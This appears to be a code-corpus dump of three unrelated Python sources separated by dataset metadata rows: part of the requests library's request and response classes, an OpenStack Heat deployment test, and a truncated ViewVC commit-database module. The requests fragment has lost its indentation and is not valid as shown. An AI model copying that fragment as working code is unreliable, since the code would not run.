url = url.decode('utf8')
else:
url = unicode(url) if is_py2 else str(url)
# Remove leading whitespaces from url
url = url.lstrip()
# Don't do any URL preparation for non-HTTP schemes like `mailto`,
# `data` etc to work around exceptions from `url_parse`, which
# handles RFC 3986 only.
if ':' in url and not url.lower().startswith('http'):
self.url = url
return
# Support for unicode domain names and paths.
try:
scheme, auth, host, port, path, query, fragment = parse_url(url)
except LocationParseError as e:
raise InvalidURL(*e.args)
if not scheme:
error = ("Invalid URL {0!r}: No schema supplied. Perhaps you meant http://{0}?")
error = error.format(to_native_string(url, 'utf8'))
raise MissingSchema(error)
if not host:
raise InvalidURL("Invalid URL %r: No host supplied" % url)
# In general, we want to try IDNA encoding the hostname if the string contains
# non-ASCII characters. This allows users to automatically get the correct IDNA
# behaviour. For strings containing only ASCII characters, we need to also verify
# it doesn't start with a wildcard (*), before allowing the unencoded hostname.
if not unicode_is_ascii(host):
try:
host = self._get_idna_encoded_host(host)
except UnicodeError:
raise InvalidURL('URL has an invalid label.')
elif host.startswith(u'*'):
raise InvalidURL('URL has an invalid label.')
# Carefully reconstruct the network location
netloc = auth or ''
if netloc:
netloc += '@'
netloc += host
if port:
netloc += ':' + str(port)
# Bare domains aren't valid URLs.
if not path:
path = '/'
if is_py2:
if isinstance(scheme, str):
scheme = scheme.encode('utf-8')
if isinstance(netloc, str):
netloc = netloc.encode('utf-8')
if isinstance(path, str):
path = path.encode('utf-8')
if isinstance(query, str):
query = query.encode('utf-8')
if isinstance(fragment, str):
fragment = fragment.encode('utf-8')
if isinstance(params, (str, bytes)):
params = to_native_string(params)
enc_params = self._encode_params(params)
if enc_params:
if query:
query = '%s&%s' % (query, enc_params)
else:
query = enc_params
url = requote_uri(urlunparse([scheme, netloc, path, None, query, fragment]))
self.url = url
def prepare_headers(self, headers):
"""Prepares the given HTTP headers."""
self.headers = CaseInsensitiveDict()
if headers:
for header in headers.items():
# Raise exception on invalid header value.
check_header_validity(header)
name, value = header
self.headers[to_native_string(name)] = value
def prepare_body(self, data, files, json=None):
"""Prepares the given HTTP body data."""
# Check if file, fo, generator, iterator.
# If not, run through normal process.
# Nottin' on you.
body = None
content_type = None
if not data and json is not None:
# urllib3 requires a bytes-like body. Python 2's json.dumps
# provides this natively, but Python 3 gives a Unicode string.
content_type = 'application/json'
body = complexjson.dumps(json)
if not isinstance(body, bytes):
body = body.encode('utf-8')
is_stream = all([
hasattr(data, '__iter__'),
not isinstance(data, (basestring, list, tuple, Mapping))
])
try:
length = super_len(data)
except (TypeError, AttributeError, UnsupportedOperation):
length = None
if is_stream:
body = data
if getattr(body, 'tell', None) is not None:
# Record the current file position before reading.
# This will allow us to rewind a file in the event
# of a redirect.
try:
self._body_position = body.tell()
except (IOError, OSError):
# This differentiates from None, allowing us to catch
# a failed `tell()` later when trying to rewind the body
self._body_position = object()
if files:
raise NotImplementedError('Streamed bodies and files are mutually exclusive.')
if length:
self.headers['Content-Length'] = builtin_str(length)
else:
self.headers['Transfer-Encoding'] = 'chunked'
else:
# Multi-part file uploads.
if files:
(body, content_type) = self._encode_files(files, data)
else:
if data:
body = self._encode_params(data)
if isinstance(data, basestring) or hasattr(data, 'read'):
content_type = None
else:
content_type = 'application/x-www-form-urlencoded'
self.prepare_content_length(body)
# Add content-type if it wasn't explicitly provided.
if content_type and ('content-type' not in self.headers):
self.headers['Content-Type'] = content_type
self.body = body
def prepare_content_length(self, body):
"""Prepare Content-Length header based on request method and body"""
if body is not None:
length = super_len(body)
if length:
# If length exists, set it. Otherwise, we fallback
# to Transfer-Encoding: chunked.
self.headers['Content-Length'] = builtin_str(length)
elif self.method not in ('GET', 'HEAD') and self.headers.get('Content-Length') is None:
# Set Content-Length to 0 for methods that can have a body
# but don't provide one. (i.e. not GET or HEAD)
self.headers['Content-Length'] = '0'
def prepare_auth(self, auth, url=''):
"""Prepares the given HTTP auth data."""
# If no Auth is explicitly provided, extract it from the URL first.
if auth is None:
url_auth = get_auth_from_url(self.url)
auth = url_auth if any(url_auth) else None
if auth:
if isinstance(auth, tuple) and len(auth) == 2:
# special-case basic HTTP auth
auth = HTTPBasicAuth(*auth)
# Allow auth to make its changes.
r = auth(self)
# Update self to reflect the auth changes.
self.__dict__.update(r.__dict__)
# Recompute Content-Length
self.prepare_content_length(self.body)
def prepare_cookies(self, cookies):
"""Prepares the given HTTP cookie data.
This function eventually generates a ``Cookie`` header from the
given cookies using cookielib. Due to cookielib's design, the header
will not be regenerated if it already exists, meaning this function
can only be called once for the life of the
:class:`PreparedRequest <PreparedRequest>` object. Any subsequent calls
to ``prepare_cookies`` will have no actual effect, unless the "Cookie"
header is removed beforehand.
"""
if isinstance(cookies, cookielib.CookieJar):
self._cookies = cookies
else:
self._cookies = cookiejar_from_dict(cookies)
cookie_header = get_cookie_header(self._cookies, self)
if cookie_header is not None:
self.headers['Cookie'] = cookie_header
def prepare_hooks(self, hooks):
"""Prepares the given hooks."""
# hooks can be passed as None to the prepare method and to this
# method. To prevent iterating over None, simply use an empty list
# if hooks is False-y
hooks = hooks or []
for event in hooks:
self.register_hook(event, hooks[event])
class Response(object):
"""The :class:`Response <Response>` object, which contains a
server's response to an HTTP request.
"""
__attrs__ = [
'_content', 'status_code', 'headers', 'url', 'history',
'encoding', 'reason', 'cookies', 'elapsed', 'request'
]
def __init__(self):
self._content = False
self._content_consumed = False
self._next = None
#: Integer Code of responded HTTP Status, e.g. 404 or 200.
self.status_code = None
#: Case-insensitive Dictionary of Response Headers.
#: For example, ``headers['content-encoding']`` will return the
#: value of a ``'Content-Encoding'`` response header.
self.headers = CaseInsensitiveDict()
#: File-like object representation of response (for advanced usage).
#: Use of ``raw`` requires that ``stream=True`` be set on the request.
# This requirement does not apply for use internally to Requests.
self.raw = None
#: Final URL location of Response.
self.url = None
#: Encoding to decode with when accessing r.text.
self.encoding = None
#: A list of :class:`Response <Response>` objects from
#: the history of the Request. Any redirect responses will end
#: up here. The list is sorted from the oldest to the most recent request.
self.history = []
#: Textual reason of responded HTTP Status, e.g. "Not Found" or "OK".
self.reason = None
#: A CookieJar of Cookies the server sent back.
self.cookies = cookiejar_from_dict({})
#: The amount of time elapsed between sending the request
#: and the arrival of the response (as a timedelta).
#: This property specifically measures the time taken between sending
#: the first byte of the request and finishing parsing the headers. It
#: is therefore unaffected by consuming the response content or the
#: value of the ``stream`` keyword argument.
self.elapsed = datetime.timedelta(0)
#: The :class:`PreparedRequest <PreparedRequest>` object to which this
#: is a response.
self.request = None
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def __getstate__(self):
# Consume everything; accessing the content attribute makes
# sure the content has been fully read.
if not self._content_consumed:
self.content
return dict(
(attr, getattr(self, attr, None))
for attr in self.__attrs__
)
def __setstate__(self, state):
for name, value in state.items():
setattr(self, name, value)
# pickled objects do not have .raw
setattr(self, '_content_consumed', True)
setattr(self, 'raw', None)
def __repr__(self):
return '<Response [%s]>' % (self.status_code)
def __bool__(self):
"""Returns True if :attr:`status_code` is less than 400.
This attribute checks if the status code of the response is between
400 and 600 to see if there was a client error or a server error. If
the status code is between 200 and 400, this will return True. This
is **not** a check to see if the response code is ``200 OK``.
"""
return self.ok
def __nonzero__(self):
"""Returns True if :attr:`status_code` is less than 400.
This attribute checks if the status code of the response is between
400 and 600 to see if there was a client error or a server error. If
the status code is between 200 and 400, this will return True. This
is **not** a check to see if the response code is ``200 OK``.
"""
return self.ok
def __iter__(self):
"""Allows you to use a response as an iterator."""
return self.iter_content(128)
@property
def ok(self):
"""Returns True if :attr:`status_code` is less than 400, False if not.
This attribute checks if the status code of the response is between
400 and 600 to see if there was a client error or a server error. If
the status code is between 200 and 400, this will return True. This
is **not** a check to see if the response code is ``200 OK``.
"""
try:
self.raise_for_status()
except HTTPError:
return False
return True
@property
def is_redirect(self):
"""True if this Response is a well-formed HTTP redirect that could have
been processed automatically (by :meth:`Session.resolve_redirects`).
"""
return ('location' in self.headers and self.status_code in REDIRECT_STATI)
@property
def is_permanent_redirect(self):
"""True if this Response one of the permanent versions of redirect."""
return ('location' in self.headers and self.status_code in (codes.moved_permanently, codes.permanent_redirect))
@property
def next(self):
"""Returns a PreparedRequest for the next request in a redirect chain, if there is one."""
return self._next
@property
def apparent_encoding(self):
"""The apparent encoding, provided by the chardet library."""
return chardet.detect(self.content)['encoding']
def iter_content(self, chunk_size=1, decode_unicode=False):
"""Iterates over the response data. When stream=True is set on the
request, this avoids reading the content at once into memory for
large responses. The chunk size is the number of bytes it should
read into memory. This is not necessarily the length of each item
returned as decoding can take place.
chunk_size must be of type int or None. A value of None will
function differently depending on the value of `stream`.
stream=True will read data as it arrives in whatever size the
chunks are received. If stream=False, data is returned as
a single chunk.
If decode_unicode is True, content will be decoded using the best
available encoding based on the response.
"""
def generate():
# Special case for urllib3.
if hasattr(self.raw, 'stream'):
try:
for chunk in self.raw.stream(chunk_size, decode_content=True):
yield chunk
except ProtocolError as e:
raise ChunkedEncodingError(e)
except DecodeError as e:
raise ContentDecodingError(e)
except ReadTimeoutError as e:
raise ConnectionError(e)
else:
# Standard file-like object.
while True:
chunk = self.raw.read(chunk_size)
if not chunk:
break
yield chunk
self._content_consumed = True
if self._content_consumed and isinstance(self._content, bool):
raise StreamConsumedError()
elif chunk_size is not None and not isinstance(chunk_size, int):
raise TypeError("chunk_size must be an int, it is instead a %s." % type(chunk_size))
# simulate reading small chunks of the content
reused_chunks = iter_slices(self._content, chunk_size)
stream_chunks = generate()
chunks = reused_chunks if self._content_consumed else stream_chunks
if decode_unicode:
chunks = stream_decode_response_unicode(chunks, self)
return chunks
def iter_lines(self, chunk_size=ITER_CHUNK_SIZE, decode_unicode=None, delimiter=None):
"""Iterates over the response data, one line at a time. When
stream=True is set on the request, this avoids reading the
content at once into memory for large responses.
.. note:: This method is not reentrant safe.
"""
pending = None
for chunk in self.iter_content(chunk_size=chunk_size, decode_unicode=decode_unicode):
if pending is not None:
chunk = pending + chunk
if delimiter:
lines = chunk.split(delimiter)
else:
lines = chunk.splitlines()
if lines and lines[-1] and chunk and lines[-1][-1] == chunk[-1]:
pending = lines.pop()
else:
pending = None
for line in lines:
yield line
if pending is not None:
yield pending
@property
def content(self):
"""Content of the response, in bytes."""
if self._content is False:
# Read the contents.
if self._content_consumed:
raise RuntimeError(
'The content for this response was already consumed')
if self.status_code == 0 or self.raw is None:
self._content = None
else:
self._content = b''.join(self.iter_content(CONTENT_CHUNK_SIZE)) or b''
self._content_consumed = True
# don't need to release the connection; that's been handled by urllib3
# since we exhausted the data.
return self._content
@property
def text(self):
"""Content of the response, in unicode.
If Response.encoding is None, encoding will be guessed using
``chardet``.
The encoding of the response content is determined based solely on HTTP
headers, following RFC 2616 to the letter. If you can take advantage of
non-HTTP knowledge to make a better guess at the encoding, you should
set ``r.encoding`` appropriately before accessing this property.
"""
# Try charset from content-type
content = None
encoding = self.encoding
if not self.content:
return str('')
# Fallback to auto-detected encoding.
if self.encoding is None:
encoding = self.apparent_encoding
# Decode unicode from given encoding.
try:
content = str(self.content, encoding, errors='replace')
except (LookupError, TypeError):
# A LookupError is raised if the encoding was not found which could
# indicate a misspelling or similar mistake.
#
# A TypeError can be raised if encoding is None
#
# So we try blindly encoding.
content = str(self.content, errors='replace')
return content
def json(self, **kwargs):
r"""Returns the json-encoded content of a response, if any.
:param \*\*kwargs: Optional arguments that ``json.loads`` takes.
:raises ValueError: If the response body does not contain valid json.
"""
if not self.encoding and self.content and len(self.content) > 3:
# No encoding set. JSON RFC 4627 section 3 states we should expect
# UTF-8, -16 or -32. Detect which one to use; If the detection or
# decoding fails, fall back to `self.text` (using chardet to make
# a best guess).
encoding = guess_json_utf(self.content)
if encoding is not None:
try:
return complexjson.loads(
self.content.decode(encoding), **kwargs
)
except UnicodeDecodeError:
# Wrong UTF codec detected; usually because it's not UTF-8
# but some other 8-bit codec. This is an RFC violation,
# and the server didn't bother to tell us what codec *was*
# used.
pass
return complexjson.loads(self.text, **kwargs)
@property
def links(self):
"""Returns the parsed header links of the response, if any."""
header = self.headers.get('link')
# l = MultiDict()
l = {}
if header:
links = parse_header_links(header)
for link in links:
key = link.get('rel') or link.get('url')
l[key] = link
return l
def raise_for_status(self):
"""Raises stored :class:`HTTPError`, if one occurred."""
http_error_msg = ''
if isinstance(self.reason, bytes):
# We attempt to decode utf-8 first because some servers
# choose to localize their reason strings. If the string
# isn't utf-8, we fall back to iso-8859-1 for all other
# encodings. (See PR #3538)
try:
reason = self.reason.decode('utf-8')
except UnicodeDecodeError:
reason = self.reason.decode('iso-8859-1')
else:
reason = self.reason
if 400 <= self.status_code < 500:
http_error_msg = u'%s Client Error: %s for url: %s' % (self.status_code, reason, self.url)
elif 500 <= self.status_code < 600:
http_error_msg = u'%s Server Error: %s for url: %s' % (self.status_code, reason, self.url)
if http_error_msg:
raise HTTPError(http_error_msg, response=self)
def close(self):
"""Releases the connection back to the pool. Once this method has been
called the underlying ``raw`` object must not be accessed again.
*Note: Should not normally need to be called explicitly.*
"""
if not self._content_consumed:
self.raw.close()
release_conn = getattr(self.raw, 'release_conn', None)
if release_conn is not None:
release_conn()
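# --- Usage sketch (not part of the file above) ---
# A minimal illustration of how the streaming helpers defined above are
# typically consumed through the public `requests` API. The URL, file path and
# chunk size are placeholder assumptions, not values taken from this source.
import requests

def download(url, path, chunk_size=8192):
    """Stream a response to disk, raising on HTTP errors."""
    r = requests.get(url, stream=True)
    r.raise_for_status()              # Response.raise_for_status() shown above
    with open(path, "wb") as fh:
        for chunk in r.iter_content(chunk_size=chunk_size):
            if chunk:                 # skip keep-alive chunks
                fh.write(chunk)
    r.close()                         # releases the connection back to the pool
    return path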
| 35.839454 | 119 | 0.59312 |
af7d671e295ab2a8935288375e10a9cc64e567dc | 4,940 | py | Python | heat_integrationtests/functional/test_software_config.py | maestro-hybrid-cloud/heat | 91a4bb3170bd81b1c67a896706851e55709c9b5a | ["Apache-2.0"] | null | null | null | heat_integrationtests/functional/test_software_config.py | maestro-hybrid-cloud/heat | 91a4bb3170bd81b1c67a896706851e55709c9b5a | ["Apache-2.0"] | null | null | null | heat_integrationtests/functional/test_software_config.py | maestro-hybrid-cloud/heat | 91a4bb3170bd81b1c67a896706851e55709c9b5a | ["Apache-2.0"] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_utils import timeutils
import requests
import time
import yaml
from heat_integrationtests.common import exceptions
from heat_integrationtests.functional import functional_base
class ParallelDeploymentsTest(functional_base.FunctionalTestsBase):
server_template = '''
heat_template_version: "2013-05-23"
parameters:
flavor:
type: string
image:
type: string
network:
type: string
resources:
server:
type: OS::Nova::Server
properties:
image: {get_param: image}
flavor: {get_param: flavor}
user_data_format: SOFTWARE_CONFIG
networks: [{network: {get_param: network}}]
outputs:
server:
value: {get_resource: server}
'''
config_template = '''
heat_template_version: "2013-05-23"
parameters:
server:
type: string
resources:
config:
type: OS::Heat::SoftwareConfig
properties:
'''
deployment_snippet = '''
type: OS::Heat::SoftwareDeployments
properties:
config: {get_resource: config}
servers: {'0': {get_param: server}}
'''
enable_cleanup = True
def test_deployments_metadata(self):
parms = {'flavor': self.conf.minimal_instance_type,
'network': self.conf.fixed_network_name,
'image': self.conf.minimal_image_ref}
stack_identifier = self.stack_create(
parameters=parms,
template=self.server_template,
enable_cleanup=self.enable_cleanup)
server_stack = self.client.stacks.get(stack_identifier)
server = server_stack.outputs[0]['output_value']
config_stacks = []
        # create config stacks in two batches: first 2 stacks x 5 deployments, then 3 stacks x 3 deployments
deploy_count = 0
deploy_count = self.deploy_many_configs(
stack_identifier,
server,
config_stacks,
2,
5,
deploy_count)
self.deploy_many_configs(
stack_identifier,
server,
config_stacks,
3,
3,
deploy_count)
self.signal_deployments(stack_identifier)
for config_stack in config_stacks:
self._wait_for_stack_status(config_stack, 'CREATE_COMPLETE')
def deploy_many_configs(self, stack, server, config_stacks,
stack_count, deploys_per_stack,
deploy_count_start):
for a in range(stack_count):
config_stacks.append(
self.deploy_config(server, deploys_per_stack))
new_count = deploy_count_start + stack_count * deploys_per_stack
self.wait_for_deploy_metadata_set(stack, new_count)
return new_count
def deploy_config(self, server, deploy_count):
parms = {'server': server}
template = yaml.safe_load(self.config_template)
resources = template['resources']
resources['config']['properties'] = {'config': 'x' * 10000}
for a in range(deploy_count):
resources['dep_%s' % a] = yaml.safe_load(self.deployment_snippet)
return self.stack_create(
parameters=parms,
template=template,
enable_cleanup=self.enable_cleanup,
expected_status=None)
def wait_for_deploy_metadata_set(self, stack, deploy_count):
build_timeout = self.conf.build_timeout
build_interval = self.conf.build_interval
start = timeutils.utcnow()
while timeutils.delta_seconds(start,
timeutils.utcnow()) < build_timeout:
server_metadata = self.client.resources.metadata(
stack, 'server')
if len(server_metadata['deployments']) == deploy_count:
return
time.sleep(build_interval)
message = ('Deployment resources failed to be created within '
'the required time (%s s).' %
(build_timeout))
raise exceptions.TimeoutException(message)
def signal_deployments(self, stack_identifier):
server_metadata = self.client.resources.metadata(
stack_identifier, 'server')
for dep in server_metadata['deployments']:
iv = dict((i['name'], i['value']) for i in dep['inputs'])
sigurl = iv.get('deploy_signal_id')
requests.post(sigurl, data='{}',
headers={'content-type': None})
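# --- Illustrative sketch (not part of the test above) ---
# Shows the template-mutation pattern used by deploy_config(): the config
# stack template is parsed with yaml.safe_load() and one deployment resource
# is appended per requested deployment. The snippet is standalone, depends
# only on PyYAML, and mirrors the 'dep_%s' naming convention above.
import yaml

CONFIG_TEMPLATE = '''
heat_template_version: "2013-05-23"
resources:
  config:
    type: OS::Heat::SoftwareConfig
'''

DEPLOYMENT_SNIPPET = '''
type: OS::Heat::SoftwareDeployments
properties:
  config: {get_resource: config}
'''

def build_config_template(deploy_count):
    template = yaml.safe_load(CONFIG_TEMPLATE)
    for a in range(deploy_count):
        template['resources']['dep_%s' % a] = yaml.safe_load(DEPLOYMENT_SNIPPET)
    return template

if __name__ == '__main__':
    print(yaml.safe_dump(build_config_template(3)))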
| 33.378378 | 78 | 0.637045 |
606f6e8d8255af7dd2d10cd0f1a51655719e2c7a | 31,751 | py | Python | lib/cvsdb.py | infamous19/viewvc | b54b7f9cd64b25ff5d95389fe15d510600218f22 | ["BSD-2-Clause"] | null | null | null | lib/cvsdb.py | infamous19/viewvc | b54b7f9cd64b25ff5d95389fe15d510600218f22 | ["BSD-2-Clause"] | null | null | null | lib/cvsdb.py | infamous19/viewvc | b54b7f9cd64b25ff5d95389fe15d510600218f22 | ["BSD-2-Clause"] | null | null | null |
# -*-python-*-
#
# Copyright (C) 1999-2020 The ViewCVS Group. All Rights Reserved.
#
# By using this file, you agree to the terms and conditions set forth in
# the LICENSE.html file which can be found at the top level of the ViewVC
# distribution or at http://viewvc.org/license-1.html.
#
# For more information, visit http://viewvc.org/
#
# -----------------------------------------------------------------------
import os
import sys
import time
import fnmatch
import re
import vclib
import dbi
## Current commits database schema version number.
##
## Version 0 was the original Bonsai-compatible version.
##
## Version 1 added the 'metadata' table (which holds the 'version' key)
## and renamed all the 'repository'-related stuff to be 'root'-related.
##
CURRENT_SCHEMA_VERSION = 1
## error
error = "cvsdb error"
## CheckinDatabase provides all interfaces needed to the SQL database
## back-end; it needs to be subclassed, and have its "Connect" method
## defined to actually be complete; it should run well off of any DBI 2.0
## compliant database interface
class CheckinDatabase:
def __init__(self, host, port, user, passwd, database):
self._host = host
self._port = port
self._user = user
self._passwd = passwd
self._database = database
self._version = None
## database lookup caches
self._get_cache = {}
self._get_id_cache = {}
self._desc_id_cache = {}
def Connect(self):
self.db = dbi.connect(
self._host, self._port, self._user, self._passwd, self._database)
cursor = self.db.cursor()
cursor.execute("SET AUTOCOMMIT=1")
table_list = self.GetTableList()
if 'metadata' in table_list:
version = self.GetMetadataValue("version")
if version is None:
self._version = 0
else:
self._version = int(version)
else:
self._version = 0
if self._version > CURRENT_SCHEMA_VERSION:
raise DatabaseVersionError("Database version %d is newer than the "
"last version supported by this "
"software." % (self._version))
def sql_get_id(self, table, column, value, auto_set):
sql = "SELECT id FROM %s WHERE %s=%%s" % (table, column)
sql_args = (value, )
cursor = self.db.cursor()
cursor.execute(sql, sql_args)
try:
(id, ) = cursor.fetchone()
except TypeError:
if not auto_set:
return None
else:
return str(int(id))
## insert the new identifier
sql = "INSERT INTO %s(%s) VALUES(%%s)" % (table, column)
sql_args = (value, )
cursor.execute(sql, sql_args)
return self.sql_get_id(table, column, value, 0)
def get_id(self, table, column, value, auto_set):
## attempt to retrieve from cache
try:
return self._get_id_cache[table][column][value]
except KeyError:
pass
id = self.sql_get_id(table, column, value, auto_set)
if id == None:
return None
## add to cache
try:
temp = self._get_id_cache[table]
except KeyError:
temp = self._get_id_cache[table] = {}
try:
temp2 = temp[column]
except KeyError:
temp2 = temp[column] = {}
temp2[value] = id
return id
def sql_get(self, table, column, id):
sql = "SELECT %s FROM %s WHERE id=%%s" % (column, table)
sql_args = (id, )
cursor = self.db.cursor()
cursor.execute(sql, sql_args)
try:
(value, ) = cursor.fetchone()
except TypeError:
return None
return value
def get(self, table, column, id):
## attempt to retrieve from cache
try:
return self._get_cache[table][column][id]
except KeyError:
pass
value = self.sql_get(table, column, id)
if value == None:
return None
## add to cache
try:
temp = self._get_cache[table]
except KeyError:
temp = self._get_cache[table] = {}
try:
temp2 = temp[column]
except KeyError:
temp2 = temp[column] = {}
temp2[id] = value
return value
def get_list(self, table, field_index):
sql = "SELECT * FROM %s" % (table)
cursor = self.db.cursor()
cursor.execute(sql)
list = []
while 1:
row = cursor.fetchone()
if row == None:
break
list.append(row[field_index])
return list
def GetCommitsTable(self):
return self._version >= 1 and 'commits' or 'checkins'
def GetTableList(self):
sql = "SHOW TABLES"
cursor = self.db.cursor()
cursor.execute(sql)
list = []
while 1:
row = cursor.fetchone()
if row == None:
break
list.append(row[0])
return list
def GetMetadataValue(self, name):
sql = "SELECT value FROM metadata WHERE name=%s"
sql_args = (name, )
cursor = self.db.cursor()
cursor.execute(sql, sql_args)
try:
(value,) = cursor.fetchone()
except TypeError:
return None
return value
def SetMetadataValue(self, name, value):
assert(self._version > 0)
sql = "REPLACE INTO metadata (name, value) VALUES (%s, %s)"
sql_args = (name, value)
cursor = self.db.cursor()
try:
cursor.execute(sql, sql_args)
except Exception, e:
raise Exception("Error setting metadata: '%s'\n"
"\tname = %s\n"
"\tvalue = %s\n"
% (str(e), name, value))
def GetBranchID(self, branch, auto_set = 1):
return self.get_id("branches", "branch", branch, auto_set)
def GetBranch(self, id):
return self.get("branches", "branch", id)
def GetDirectoryID(self, dir, auto_set = 1):
return self.get_id("dirs", "dir", dir, auto_set)
def GetDirectory(self, id):
return self.get("dirs", "dir", id)
def GetFileID(self, file, auto_set = 1):
return self.get_id("files", "file", file, auto_set)
def GetFile(self, id):
return self.get("files", "file", id)
def GetAuthorID(self, author, auto_set = 1):
return self.get_id("people", "who", author, auto_set)
def GetAuthor(self, id):
return self.get("people", "who", id)
def GetRepositoryID(self, repository, auto_set = 1):
return self.get_id("repositories", "repository", repository, auto_set)
def GetRepository(self, id):
return self.get("repositories", "repository", id)
def SQLGetDescriptionID(self, description, auto_set = 1):
## lame string hash, blame Netscape -JMP
hash = len(description)
sql = "SELECT id FROM descs WHERE hash=%s AND description=%s"
sql_args = (hash, description)
cursor = self.db.cursor()
cursor.execute(sql, sql_args)
try:
(id, ) = cursor.fetchone()
except TypeError:
if not auto_set:
return None
else:
return str(int(id))
sql = "INSERT INTO descs (hash,description) values (%s,%s)"
sql_args = (hash, description)
cursor.execute(sql, sql_args)
return self.GetDescriptionID(description, 0)
def GetDescriptionID(self, description, auto_set = 1):
## attempt to retrieve from cache
hash = len(description)
try:
return self._desc_id_cache[hash][description]
except KeyError:
pass
id = self.SQLGetDescriptionID(description, auto_set)
if id == None:
return None
## add to cache
try:
temp = self._desc_id_cache[hash]
except KeyError:
temp = self._desc_id_cache[hash] = {}
temp[description] = id
return id
def GetDescription(self, id):
return self.get("descs", "description", id)
def GetRepositoryList(self):
return self.get_list("repositories", 1)
def GetBranchList(self):
return self.get_list("branches", 1)
def GetAuthorList(self):
return self.get_list("people", 1)
def AddCommitList(self, commit_list):
for commit in commit_list:
self.AddCommit(commit)
def AddCommit(self, commit):
ci_when = dbi.DateTimeFromTicks(commit.GetTime() or 0.0)
ci_type = commit.GetTypeString()
who_id = self.GetAuthorID(commit.GetAuthor())
repository_id = self.GetRepositoryID(commit.GetRepository())
directory_id = self.GetDirectoryID(commit.GetDirectory())
file_id = self.GetFileID(commit.GetFile())
revision = commit.GetRevision()
sticky_tag = "NULL"
branch_id = self.GetBranchID(commit.GetBranch())
plus_count = commit.GetPlusCount() or '0'
minus_count = commit.GetMinusCount() or '0'
description_id = self.GetDescriptionID(commit.GetDescription())
sql = "REPLACE INTO %s" % (self.GetCommitsTable())
sql = sql + \
" (type,ci_when,whoid,repositoryid,dirid,fileid,revision,"\
" stickytag,branchid,addedlines,removedlines,descid)"\
"VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)"
sql_args = (ci_type, ci_when, who_id, repository_id,
directory_id, file_id, revision, sticky_tag, branch_id,
plus_count, minus_count, description_id)
cursor = self.db.cursor()
try:
cursor.execute(sql, sql_args)
except Exception, e:
raise Exception("Error adding commit: '%s'\n"
"Values were:\n"
"\ttype = %s\n"
"\tci_when = %s\n"
"\twhoid = %s\n"
"\trepositoryid = %s\n"
"\tdirid = %s\n"
"\tfileid = %s\n"
"\trevision = %s\n"
"\tstickytag = %s\n"
"\tbranchid = %s\n"
"\taddedlines = %s\n"
"\tremovedlines = %s\n"
"\tdescid = %s\n"
% ((str(e), ) + sql_args))
def SQLQueryListString(self, field, query_entry_list):
sqlList = []
for query_entry in query_entry_list:
data = query_entry.data
## figure out the correct match type
if query_entry.match == "exact":
match = "="
elif query_entry.match == "like":
match = " LIKE "
elif query_entry.match == "glob":
match = " REGEXP "
# Use fnmatch to translate the glob into a regular
# expression. Sadly, we have to account for the fact
# that in Python 2.6, fnmatch.translate() started
# sticking '\Z(?ms)' at the end of the regular
# expression instead of just '$', and doesn't prepend
# the '^'.
data = fnmatch.translate(data)
if data[0] != '^':
data = '^' + data
if data[-7:] == '\Z(?ms)':
data = data[:-7] + '$'
elif query_entry.match == "regex":
match = " REGEXP "
elif query_entry.match == "notregex":
match = " NOT REGEXP "
sqlList.append("%s%s%s" % (field, match, self.db.literal(data)))
return "(%s)" % (" OR ".join(sqlList))
def CreateSQLQueryString(self, query, detect_leftover=0):
commits_table = self.GetCommitsTable()
tableList = [(commits_table, None)]
condList = []
if len(query.repository_list):
tableList.append(("repositories",
"(%s.repositoryid=repositories.id)"
% (commits_table)))
temp = self.SQLQueryListString("repositories.repository",
query.repository_list)
condList.append(temp)
if len(query.branch_list):
tableList.append(("branches",
"(%s.branchid=branches.id)" % (commits_table)))
temp = self.SQLQueryListString("branches.branch",
query.branch_list)
condList.append(temp)
if len(query.directory_list):
tableList.append(("dirs",
"(%s.dirid=dirs.id)" % (commits_table)))
temp = self.SQLQueryListString("dirs.dir", query.directory_list)
condList.append(temp)
if len(query.file_list):
tableList.append(("files",
"(%s.fileid=files.id)" % (commits_table)))
temp = self.SQLQueryListString("files.file", query.file_list)
condList.append(temp)
if len(query.author_list):
tableList.append(("people",
"(%s.whoid=people.id)" % (commits_table)))
temp = self.SQLQueryListString("people.who", query.author_list)
condList.append(temp)
if len(query.comment_list):
tableList.append(("descs",
"(%s.descid=descs.id)" % (commits_table)))
temp = self.SQLQueryListString("descs.description",
query.comment_list)
condList.append(temp)
if query.from_date:
temp = "(%s.ci_when>=\"%s\")" \
% (commits_table, str(query.from_date))
condList.append(temp)
if query.to_date:
temp = "(%s.ci_when<=\"%s\")" \
% (commits_table, str(query.to_date))
condList.append(temp)
if query.sort == "date":
order_by = "ORDER BY %s.ci_when DESC,descid" % (commits_table)
elif query.sort == "author":
tableList.append(("people",
"(%s.whoid=people.id)" % (commits_table)))
order_by = "ORDER BY people.who,descid"
elif query.sort == "file":
tableList.append(("files",
"(%s.fileid=files.id)" % (commits_table)))
order_by = "ORDER BY files.file,descid"
## exclude duplicates from the table list, and split out join
## conditions from table names. In future, the join conditions
## might be handled by INNER JOIN statements instead of WHERE
## clauses, but MySQL 3.22 apparently doesn't support them well.
tables = []
joinConds = []
for (table, cond) in tableList:
if table not in tables:
tables.append(table)
if cond is not None: joinConds.append(cond)
tables = ",".join(tables)
conditions = " AND ".join(joinConds + condList)
conditions = conditions and "WHERE %s" % conditions
## apply the query's row limit, if any (so we avoid really
## slamming a server with a large database)
limit = ""
if query.limit:
if detect_leftover:
limit = "LIMIT %s" % (str(query.limit + 1))
else:
limit = "LIMIT %s" % (str(query.limit))
sql = "SELECT %s.* FROM %s %s %s %s" \
% (commits_table, tables, conditions, order_by, limit)
return sql
def RunQuery(self, query):
sql = self.CreateSQLQueryString(query, 1)
cursor = self.db.cursor()
cursor.execute(sql)
query.SetExecuted()
row_count = 0
while 1:
row = cursor.fetchone()
if not row:
break
row_count = row_count + 1
if query.limit and (row_count > query.limit):
query.SetLimitReached()
break
(dbType, dbCI_When, dbAuthorID, dbRepositoryID, dbDirID,
dbFileID, dbRevision, dbStickyTag, dbBranchID, dbAddedLines,
dbRemovedLines, dbDescID) = row
commit = LazyCommit(self)
if dbType == 'Add':
commit.SetTypeAdd()
elif dbType == 'Remove':
commit.SetTypeRemove()
else:
commit.SetTypeChange()
